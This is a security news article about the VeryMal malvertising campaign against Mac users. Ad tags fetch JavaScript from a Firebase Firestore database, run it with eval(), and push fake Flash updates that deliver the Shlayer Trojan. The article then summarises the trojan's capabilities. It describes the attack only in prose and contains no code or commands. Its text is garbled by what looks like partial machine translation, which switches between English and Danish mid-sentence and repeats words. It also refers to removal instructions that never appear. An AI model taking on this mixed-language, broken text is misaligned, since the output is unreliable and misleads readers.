Extensive Mac Malvertising Campaign Delivers Shlayer Trojan

Extensive Mac Malvertising Campaign Delivers Shlayer Trojan

1 Star2 Stars3 Stars4 Stars5 Stars (Ingen stemmer endnu)
Loading ...

En ny, large-scale Mac malvertising campaign was just discovered. Security researchers at Confiant say that approximately 1 million user sessions have been potentially exposed. The payload of the malvertising campaign is the Shlayer Trojan.

Who’s Behind the Mac Malvertising Campaign?

It’s believed that a group known as VeryMal is behind these Mac malvertising attacks. The group has been targeting Mac users, and it seems that it just changes switched to a new malicious scenario. Tidligere, VeryMal criminals used steganography as an obfuscation technique. Nu, the group is utilizing ad tags that retrieve a payload from Google Firebase with the purpose of redirecting users to malicious pop-ups, Confiant said.

What is Firebase? Firebase is a mobile and web application development platform developed by Firebase, Inc. i 2011, then acquired by Google in 2014. The platform is rich in features, and has a cloud-hosted backend suite which is typically used for mobile app development. One of the components exploited by the attackers is Firestore, and it’s been leveraged in creative tags.

"The code in the tag actually does nothing more than request an entry from the attacker’s Firestore DB and then execute it as JavaScript using the eval() statement on line 27", forskerne bemærkede.

After first checking to see if it’s running in a desktop Safari environment, the code has a sub-condition that checks to see if “navigator.javaEnabled()” has been tampered with in the current environment. If all checks out, the payload will redirect the unsuspecting visitor to the Flash prompt. The notable aspect however is that the tag looks to most people and defense mechanisms like a normal, innocuous ad tag.

Heldigvis, Google has suspended the abused Firebase accounts, but researchers believe that cybercriminals with continue to leverage this technique.

As for the display-ad redirects, they are being deployed to deliver fake Flash updates to unsuspecting users. Once the potential victim interacts with the ad on a website, a pop-up shows prompting the user to update their Flash player. Upon agreeing to the prompt, the payload, Shlayer Trojan, will be deployed.

Den Shlayer malware blev først opdaget i februar 2018 af Intego forskere. The latest variant however was found by Carbon Black.
Shlayer Macos Malware Deaktiverer Gatekeeper og downloads Adware.

More about the Shlayer Trojan

The Shlayer Trojan has been known for using fake Adobe Flash updates. A previous campaign used fake updates fake updates that masqueraded as legitimate sites, eller kapret domæner tidligere vært legitime websteder.

Malicious browser extensions have also been used by the Trojan. The dangerous code is disguised once again as an Adobe Flash Player installer.

Keep in mind that the Shlayer Mac Trojan can lead to further infections. Given its complex modular design, it can easily be used for other malicious purposes, såsom følgende:

Information Høst. The malware can be used to harvest data that can be configured to extract both machine metrics and user information. Den første kategori bruges til at generere et unikt id, der er tildelt hver enkelt maskine. This is done via an algorithm that uses a list of installed hardware components, brugerindstillinger og andre operativsystem målinger. Det kan også direkte afsløre identiteten af ​​ofrene ved at se ud efter strenge, der kan afsløre deres navn, adresse, telefonnummer, placering og eventuelle gemte kontooplysninger.

System Ændringer. To facilitate further infections the payload code can make various changes to the compromised machines — configuration files, operativsystemmiljø værdier og brugerindstillinger.

Boot Options Ændringer. By accessing the Mac OS computers settings the Shlayer Trojan can set itself or the other deployed payloads to automatically start when the computer is powered on.

Yderligere Payload Levering. The Trojan can be used to deliver other threats to the computers such as miners and ransomware.

If you suspect that you’ve been compromised by a Mac malvertising campaign that dropped the Shlayer Trojan on your Mac, you can refer to the instructions provided below to clean your system.

Milena Dimitrova

En inspireret forfatter og indhold leder, der har været med SensorsTechForum for 4 år. Nyder ’Mr. Robot’og frygt’1984’. Fokuseret på brugernes privatliv og malware udvikling, hun tror stærkt på en verden, hvor cybersikkerhed spiller en central rolle. Hvis almindelig sund fornuft giver ingen mening, hun vil være der til at tage noter. Disse noter senere kan blive til artikler!

Flere indlæg

Efterlad en kommentar

Din e-mail-adresse vil ikke blive offentliggjort. Krævede felter er markeret *

Frist er opbrugt. Venligst genindlæse CAPTCHA.

Del på Facebook Del
Loading ...
Del på Twitter Tweet
Loading ...
Del på Google Plus Del
Loading ...
Del på Linkedin Del
Loading ...
Del på Digg Del
Del på Reddit Del
Loading ...
Del på Stumbleupon Del
Loading ...